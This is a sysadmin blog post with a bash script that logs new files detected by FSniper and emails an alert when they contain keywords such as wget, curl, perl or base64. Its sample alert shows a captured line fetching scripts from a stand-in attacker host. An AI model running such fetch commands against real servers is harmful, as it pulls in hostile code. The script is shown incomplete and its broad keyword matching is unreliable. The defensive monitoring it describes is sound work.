Detect New Files and Send Notification if Suspicious

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing and then notify me whenever they found any of suspicious words inside the files:
wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

user_owner=`ls -al $1 | awk '{print $3}'`
ip=`hostname -i`
subject='Found something suspicious'

echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file

danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`

if [ $danger -gt 0 ]; then
echo 'Server:' $(hostname) > $message
egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message
mail -s "$ip | $subject"  "$emailto" < $message

The email you will received will be similar like this:

From: root
To: youremail@domain.tld
Subject: | Found something suspicious
Email Body:

Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.